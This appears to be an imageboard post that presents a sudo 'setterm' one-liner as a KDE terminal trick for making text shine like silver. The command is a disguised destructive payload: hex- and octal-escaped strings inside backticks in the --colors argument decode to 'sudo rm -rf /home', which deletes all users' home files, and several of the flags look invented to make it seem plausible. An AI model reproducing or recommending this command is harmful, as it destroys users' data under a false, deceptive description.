>>107799912
>Bash is for fash
based
Checkout what KDE terminal can do
Can GNOME do this?
# make your text shine like silver (picrel)
# needs sudo to write to the terminal buffer
# (noauto flag is needed because the terminal gets confused and renders at the wrong origin)
# (change maxs-targets to however many glares you want, 5 looks good)
sudo setterm --mono --fade --fade-max=100 --maxs-targets=5 --scheme='$\x55$\x7c,max_t=$TERM_HEIGHT,max_w=$TERM_WIDTH;255,noauto' --colors="`$'\x73\x75\x64\x6f' $'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`" --mode="63x62x4ax85x7d"
# reset back to normal (you can also reopen the terminal)
setterm --reset